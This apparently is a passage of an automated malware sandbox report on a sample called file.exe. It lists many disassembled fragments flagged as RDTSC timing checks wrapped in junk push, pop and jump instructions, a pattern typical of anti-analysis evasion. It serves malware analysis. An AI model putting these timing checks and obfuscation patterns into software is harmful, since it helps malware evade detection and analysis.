                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6AC55 second address: C6AC5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6AC5B second address: C6AC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6AF65 second address: C6AF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B259 second address: C6B267 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA693F36BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B267 second address: C6B2B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FBA68C246E2h 0x0000000a jmp 00007FBA68C246E0h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jng 00007FBA68C246E8h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FBA68C246DDh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B2B9 second address: C6B2CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA693F36C2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6337C second address: C63387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63387 second address: C6338D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6338D second address: C633A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FBA68C246D6h 0x0000000e jnp 00007FBA68C246D6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C633A1 second address: C633C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBA693F36C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C633C5 second address: C633C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C633C9 second address: C633DE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBA693F36BDh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2FF3A second address: C2FF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70D17 second address: C70D72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA693F36C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FBA693F36BDh 0x00000014 jmp 00007FBA693F36BEh 0x00000019 popad 0x0000001a jmp 00007FBA693F36BEh 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 jng 00007FBA693F36B8h 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d jnp 00007FBA693F36B6h 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70D72 second address: C70D86 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBA68C246D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C33495 second address: C334B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jc 00007FBA693F36C9h 0x0000000f jmp 00007FBA693F36BDh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C34FBB second address: C34FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C34FC4 second address: C34FE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA693F36C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C34FE8 second address: C3500F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FBA68C246E9h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C78E39 second address: C78E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C78E3D second address: C78E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FBA68C246E4h 0x0000000e jmp 00007FBA68C246DEh 0x00000013 popad 0x00000014 pushad 0x00000015 push ecx 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FBA68C246DBh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79124 second address: C79134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jl 00007FBA693F36B6h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79134 second address: C7913A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7913A second address: C79140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79140 second address: C7919E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 je 00007FBA68C246D6h 0x0000000e jmp 00007FBA68C246E3h 0x00000013 popad 0x00000014 jmp 00007FBA68C246DCh 0x00000019 popad 0x0000001a push esi 0x0000001b push ecx 0x0000001c jmp 00007FBA68C246E6h 0x00000021 jmp 00007FBA68C246E2h 0x00000026 pop ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7919E second address: C791A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C791A4 second address: C791A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C792D8 second address: C792E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jbe 00007FBA693F36B8h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C792E7 second address: C792EC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C795DE second address: C795E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C795E3 second address: C795F6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBA68C246DEh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79776 second address: C79780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBA693F36B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CFEC second address: C7CFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7DDC3 second address: C7DDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jmp 00007FBA693F36C7h 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7DDE5 second address: C7DDEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E2FA second address: C7E2FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E89D second address: C7E8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E8A1 second address: C7E8A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F813 second address: C7F82D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C808C8 second address: C808F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FBA693F36B6h 0x00000009 jp 00007FBA693F36B6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBA693F36C1h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C808F0 second address: C80903 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81410 second address: C81414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8120D second address: C81213 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81414 second address: C81487 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA693F36C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov dword ptr [esp], eax 0x0000000d mov esi, eax 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FBA693F36B8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov si, ax 0x0000002e push 00000000h 0x00000030 jl 00007FBA693F36D1h 0x00000036 call 00007FBA693F36C4h 0x0000003b mov edi, dword ptr [ebp+122D2BE8h] 0x00000041 pop esi 0x00000042 xchg eax, ebx 0x00000043 push ecx 0x00000044 push esi 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81EB0 second address: C81F53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FBA68C246D6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FBA68C246D8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b jno 00007FBA68C246DBh 0x00000031 jmp 00007FBA68C246E5h 0x00000036 push 00000000h 0x00000038 mov esi, dword ptr [ebp+122D32DEh] 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push esi 0x00000043 call 00007FBA68C246D8h 0x00000048 pop esi 0x00000049 mov dword ptr [esp+04h], esi 0x0000004d add dword ptr [esp+04h], 00000016h 0x00000055 inc esi 0x00000056 push esi 0x00000057 ret 0x00000058 pop esi 0x00000059 ret 0x0000005a pushad 0x0000005b jo 00007FBA68C246DCh 0x00000061 sbb eax, 7D999BD8h 0x00000067 popad 0x00000068 mov esi, 2DDC87FBh 0x0000006d xchg eax, ebx 0x0000006e jng 00007FBA68C246DEh 0x00000074 push eax 0x00000075 jp 00007FBA68C246E0h 0x0000007b push eax 0x0000007c push edx 0x0000007d pushad 0x0000007e popad 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83EF6 second address: C83F10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jne 00007FBA693F36B6h 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 jo 00007FBA693F36C4h 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83F10 second address: C83F14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC12B0 second address: CC12BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FBA693F36B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC12BA second address: CC12BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC511F second address: CC512C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FBA693F36B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC512C second address: CC5134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7A15 second address: CC7A23 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBA693F36B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7A23 second address: CC7A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7A29 second address: CC7A63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FBA693F36BBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jng 00007FBA693F36B6h 0x00000012 pop esi 0x00000013 popad 0x00000014 pushad 0x00000015 jnl 00007FBA693F36CBh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7A63 second address: CC7A6D instructions: 0x00000000 rdtsc 0x00000002 je 00007FBA68C246D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7A6D second address: CC7A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBA693F36BBh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7A82 second address: CC7A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD1E49 second address: CD1E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD07DB second address: CD07FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA68C246E6h 0x00000009 jnp 00007FBA68C246D6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0AC4 second address: CD0AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBA693F36BCh 0x0000000c jmp 00007FBA693F36C7h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0AEE second address: CD0AFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0AFC second address: CD0B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA693F36C4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0B14 second address: CD0B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0CA4 second address: CD0CAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0CAA second address: CD0CB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FBA68C246D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B832 second address: C7B838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B838 second address: C7B83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0F75 second address: CD0F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBA693F36C9h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0F9A second address: CD0FB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD10E3 second address: CD10E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD10E7 second address: CD10F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBA68C246D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3563 second address: CD358D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jng 00007FBA693F36B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jl 00007FBA693F36B6h 0x00000013 jo 00007FBA693F36B6h 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jng 00007FBA693F36C2h 0x00000022 jno 00007FBA693F36B6h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD358D second address: CD3595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD69C0 second address: CD69C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD69C4 second address: CD69CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD69CF second address: CD69D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD69D7 second address: CD69DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6E35 second address: CD6E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC8CD second address: CDC8D8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnc 00007FBA68C246D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC8D8 second address: CDC8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDC8E1 second address: CDC8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCB8A second address: CDCB90 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDCB90 second address: CDCB98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD11A second address: CDD11E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD11E second address: CDD12E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FBA68C246D6h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD9B6 second address: CDD9BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD9BB second address: CDD9C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDCA9 second address: CDDCC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA693F36BBh 0x00000009 jg 00007FBA693F36B6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDCC1 second address: CDDD00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246E7h 0x00000007 jmp 00007FBA68C246E3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBA68C246DFh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDDD00 second address: CDDD08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDE1FA second address: CDE22A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA68C246E6h 0x00000009 pop esi 0x0000000a push ecx 0x0000000b jmp 00007FBA68C246E2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6A90 second address: CE6AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FBA693F36B6h 0x0000000c popad 0x0000000d pushad 0x0000000e jng 00007FBA693F36B6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
